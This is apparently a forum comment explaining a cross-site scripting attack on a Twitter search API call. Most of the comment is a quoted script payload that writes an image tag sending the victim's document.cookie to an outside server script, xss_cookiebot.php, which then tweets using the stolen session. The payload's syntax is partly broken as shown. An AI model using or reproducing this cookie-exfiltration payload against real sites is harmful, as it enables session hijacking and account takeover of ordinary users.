It's a classical cookie stealing attack by injecting an image tag into a twitter search api call.<p><pre><code> <script>
document.location="http://dev.twitter.com/search?query==</script>
<script>
document.write(<img src="http://skeptikal.org/exploits/twitter/xss_cookiebot.php?" + document.cookie + ">");
</script>
</code></pre>
Once the cookiebot has the session cookie it tweets. That stuff is done server-side in the xss_cookiebot.php PHP script.